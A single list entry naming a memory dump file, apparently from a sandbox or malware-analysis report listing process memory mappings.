- memory/5108-177-0x0000000000000000-mapping.dmp